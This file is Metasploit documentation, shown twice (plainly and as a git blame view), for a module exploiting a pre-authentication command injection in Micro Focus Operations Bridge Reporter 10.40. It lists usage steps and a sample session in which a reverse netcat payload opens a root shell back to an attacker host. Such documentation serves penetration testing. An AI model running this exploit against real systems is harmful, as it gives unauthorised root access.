documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md

## Vulnerable Application

This module exploits a command injection vulnerability on *login* (yes, you read that right) that affects Micro Focus Operations
Bridge Reporter on Linux, versions 10.40 and below.
It's a straight up command injection, with little escaping required and it works before authentication.
This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.

Installation docs are available at:

* https://docs.microfocus.com/itom/Operations_Bridge_Reporter:10.40/Home

Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.
This vulnerability only affects Linux installations.

All details about this vulnerability can be obtained from the advisory:

* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md

## Verification Steps

1. Install the application
2. Start msfconsole
3. `use exploit/multi/http/microfocus_obr_cmd_injection`
4. `set payload PAYLOAD`
5. `set rhost TARGET`
6. `set lhost YOUR_IP`
7. `run`
8. You should get a shell.

## Scenarios

```
msf > use exploit/linux/http/microfocus_obr_cmd_injection
msf exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10
rhost => 10.0.0.10
msf exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(linux/http/microfocus_obr_cmd_injection) > run

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00			`## Vulnerable Application`

			`This module exploits a command injection vulnerability on login (yes, you read that right) that affects Micro Focus Operations`
			`Bridge Reporter on Linux, versions 10.40 and below.`
			`It's a straight up command injection, with little escaping required and it works before authentication.`
			`This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.`

			`Installation docs are available at:`

			`* https://docs.microfocus.com/itom/Operations_Bridge_Reporter:10.40/Home`

			`Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.`
			`This vulnerability only affects Linux installations.`

spelling fixes on docs 2023-10-10 14:46:18 -04:00			`All details about this vulnerability can be obtained from the advisory:`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00
			`* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. `use exploit/multi/http/microfocus_obr_cmd_injection`
			4. `set payload PAYLOAD`
Update microfocus_obr_cmd_injection.md 2021-04-25 11:02:54 +08:00			5. `set rhost TARGET`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00			6. `set lhost YOUR_IP`
			7. `run`
			`8. You should get a shell.`

			`## Scenarios`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/microfocus_obr_cmd_injection`
			`msf exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00			`payload => cmd/unix/reverse_netcat`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00			`rhost => 10.0.0.10`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00			`lhost => 10.0.0.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/microfocus_obr_cmd_injection) > run`
add sploit for MF OBR cmd injection 2021-04-23 21:04:36 +07:00
			`[*] Started reverse TCP handler on 10.0.0.1:4444`
			`[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!`
			`[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700`

			`id`
			`uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0`
			`uname -a`
			`Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux`
			```